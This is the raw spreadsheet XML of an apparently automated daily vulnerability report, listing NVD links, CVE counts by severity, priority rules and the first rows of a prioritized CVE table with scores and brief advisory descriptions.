TargetMode="External" Id="rId2213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0309" TargetMode="External" Id="rId2214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28581" TargetMode="External" Id="rId2215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70595" TargetMode="External" Id="rId2216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80159" TargetMode="External" Id="rId2217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88059" TargetMode="External" Id="rId2218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70598" TargetMode="External" Id="rId2219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70467" TargetMode="External" Id="rId2220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55785" TargetMode="External" Id="rId2221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58239" TargetMode="External" Id="rId2222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66774" TargetMode="External" Id="rId2223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71849" TargetMode="External" Id="rId2224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73425" TargetMode="External" Id="rId2225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78124" TargetMode="External" Id="rId2226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84367" TargetMode="External" Id="rId2227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84368" TargetMode="External" Id="rId2228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15695" TargetMode="External" Id="rId2229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69904" TargetMode="External" Id="rId2230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76960" TargetMode="External" Id="rId2231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76961" TargetMode="External" Id="rId2232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17483" TargetMode="External" Id="rId2233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28582" TargetMode="External" Id="rId2234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28622" TargetMode="External" Id="rId2235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28623" TargetMode="External" Id="rId2236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28638" TargetMode="External" Id="rId2237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28671" TargetMode="External" Id="rId2238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45521" TargetMode="External" Id="rId2239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59326" TargetMode="External" Id="rId2240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86503" TargetMode="External" Id="rId2241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28652" TargetMode="External" Id="rId2242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70600" TargetMode="External" Id="rId2243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84389" TargetMode="External" Id="rId2244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-69873" TargetMode="External" Id="rId2245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86231" TargetMode="External" Id="rId2246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70430" TargetMode="External" Id="rId2247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84392" TargetMode="External" Id="rId2248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87525" TargetMode="External" Id="rId2249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0303" TargetMode="External" Id="rId2250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15418" TargetMode="External" Id="rId2251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71438" TargetMode="External" Id="rId2252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73087" TargetMode="External" Id="rId2253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73491" TargetMode="External" Id="rId2254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73492" TargetMode="External" Id="rId2255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81738" TargetMode="External" Id="rId2256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82060" TargetMode="External" Id="rId2257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86441" TargetMode="External" Id="rId2258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58234" TargetMode="External" Id="rId2259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0292" TargetMode="External" Id="rId2260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15310" TargetMode="External" Id="rId2261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73427" TargetMode="External" Id="rId2262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82865" TargetMode="External" Id="rId2263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86228" TargetMode="External" Id="rId2264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86264" TargetMode="External" Id="rId2265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86512" TargetMode="External" Id="rId2266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86517" TargetMode="External" Id="rId2267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86674" TargetMode="External" Id="rId2268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48791" TargetMode="External" Id="rId2269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53759" TargetMode="External" Id="rId2270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85643" TargetMode="External" Id="rId2271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82312" TargetMode="External" Id="rId2272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0291" TargetMode="External" Id="rId2273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0302" TargetMode="External" Id="rId2274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0308" TargetMode="External" Id="rId2275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86422" TargetMode="External" Id="rId2276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0289" TargetMode="External" Id="rId2277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0290" TargetMode="External" Id="rId2278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-26962" TargetMode="External" Id="rId2279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-36392" TargetMode="External" Id="rId2280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4765" TargetMode="External" Id="rId2281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61634" TargetMode="External" Id="rId2282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71802" TargetMode="External" Id="rId2283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72885" TargetMode="External" Id="rId2284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80841" TargetMode="External" Id="rId2285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80847" TargetMode="External" Id="rId2286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80858" TargetMode="External" Id="rId2287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80859" TargetMode="External" Id="rId2288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80860" TargetMode="External" Id="rId2289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80861" TargetMode="External" Id="rId2290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80878" TargetMode="External" Id="rId2291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80915" TargetMode="External" Id="rId2292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80916" TargetMode="External" Id="rId2293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80917" TargetMode="External" Id="rId2294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80918" TargetMode="External" Id="rId2295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80919" TargetMode="External" Id="rId2296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80920" TargetMode="External" Id="rId2297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80922" TargetMode="External" Id="rId2298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80923" TargetMode="External" Id="rId2299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80925" TargetMode="External" Id="rId2300" /></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6" customWidth="1" min="1" max="1"/>
    <col width="70" customWidth="1" min="2" max="2"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="inlineStr">
        <is>
          <t>Daily Vulnerability Report</t>
        </is>
      </c>
      <c r="B1" t="inlineStr"/>
    </row>
    <row r="2">
      <c r="A2" s="2" t="inlineStr">
        <is>
          <t>Report date</t>
        </is>
      </c>
      <c r="B2" s="3" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Window (UTC)</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>2026-09-08T12:30 to 2026-09-11T12:30</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Generated</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>2026-09-11 12:32:41 UTC</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr"/>
      <c r="B5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Total CVEs</t>
        </is>
      </c>
      <c r="B6" s="3" t="n">
        <v>6125</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t>In CISA KEV (actively exploited)</t>
        </is>
      </c>
      <c r="B7" s="3" t="n">
        <v>19</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="B8" s="3" t="n">
        <v>706</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="B9" s="3" t="n">
        <v>2821</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="B10" s="3" t="n">
        <v>2240</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="B11" s="3" t="n">
        <v>263</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>Unscored (awaiting NVD analysis)</t>
        </is>
      </c>
      <c r="B12" s="3" t="n">
        <v>90</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Watchlist matches</t>
        </is>
      </c>
      <c r="B13" s="3" t="n">
        <v>2300</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr"/>
      <c r="B14" s="3" t="inlineStr"/>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Sources</t>
        </is>
      </c>
      <c r="B15" s="3" t="inlineStr">
        <is>
          <t>NVD API 2.0, CISA KEV catalogue, FIRST EPSS</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>Watchlist keywords</t>
        </is>
      </c>
      <c r="B16" s="3" t="inlineStr">
        <is>
          <t>microsoft, windows, oracle, java, openssl, openssh, linux kernel, red hat, ubuntu, vmware, citrix, fortinet, palo alto, cisco, f5, ibm, websphere, db2, sap, apache, tomcat, nginx, kubernetes, docker, jenkins, gitlab, atlassian, jira, confluence, spring, log4j, node.js, python, .net, postgresql, mysql, mongodb, redis, elasticsearch, kafka, azure, aws, okta, active directory</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr"/>
      <c r="B17" s="3" t="inlineStr"/>
    </row>
    <row r="18">
      <c r="A18" s="2" t="inlineStr">
        <is>
          <t>Priority rules</t>
        </is>
      </c>
      <c r="B18" s="3" t="inlineStr"/>
    </row>
    <row r="19">
      <c r="A19" s="2" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B19" s="3" t="inlineStr">
        <is>
          <t>In CISA KEV, or EPSS &gt;= 0.50</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="2" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="3" t="inlineStr">
        <is>
          <t>CVSS &gt;= 9.0, or CVSS &gt;= 7.0 with EPSS &gt;= 0.10</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="2" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="3" t="inlineStr">
        <is>
          <t>CVSS &gt;= 7.0</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="2" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B22" s="3" t="inlineStr">
        <is>
          <t>Everything else, incl. CVEs not yet scored by NVD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1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CVE-2026-20079</t>
        </is>
      </c>
      <c r="C2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F2" s="5" t="n">
        <v>0.747</v>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr">
        <is>
          <t>cisco:secure_firewall_management_center</t>
        </is>
      </c>
      <c r="I2" s="5" t="inlineStr">
        <is>
          <t>2026-03-04</t>
        </is>
      </c>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web interface of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.&amp;nbsp;
This vulnerability is due to an improper system process that is created at boot time. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute a variety of scripts and commands that allow&amp;nbsp;root access to the device.&amp;nbsp;</t>
        </is>
      </c>
      <c r="M2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75650</t>
        </is>
      </c>
      <c r="C3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F3" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L3"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M3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86218</t>
        </is>
      </c>
      <c r="C4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F4" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr">
        <is>
          <t>n-able:n-central</t>
        </is>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>CWE-96</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>N-central is vulnerable to a pre-auth remote code execution This issue affects N-central: before 2026.3.1.14.</t>
        </is>
      </c>
      <c r="M4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>CVE-2016-4117</t>
        </is>
      </c>
      <c r="C5" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F5" s="5" t="n">
        <v>0.944</v>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr">
        <is>
          <t>adobe:flash_player, opensuse:evergreen, opensuse:opensuse, redhat:enterprise_linux_desktop, redhat:enterprise_linux_server, redhat:enterprise_linux_server_from_rhui, redhat:enterprise_linux_workstation, suse:linux_enterprise_desktop, suse:linux_enterprise_workstation_extension</t>
        </is>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>2016-05-11</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>2022-03-24</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in May 2016.</t>
        </is>
      </c>
      <c r="M5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2016-4117</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-41352</t>
        </is>
      </c>
      <c r="C6" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F6" s="5" t="n">
        <v>0.955</v>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>red hat, ubuntu</t>
        </is>
      </c>
      <c r="H6" s="5" t="inlineStr">
        <is>
          <t>synacor:zimbra_collaboration_suite</t>
        </is>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>2022-09-26</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>2022-11-10</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.</t>
        </is>
      </c>
      <c r="M6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-41352</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="C7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F7" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H7" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortios, fortinet:fortisase, fortinet:fortiswitchmanager, siemens:ruggedcom_ape1808, siemens:ruggedcom_ape1808_firmware</t>
        </is>
      </c>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>2026-01-13</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiOS 6.4 all versions, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows attacker to execute unauthorized code or commands via specially crafted packets</t>
        </is>
      </c>
      <c r="M7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
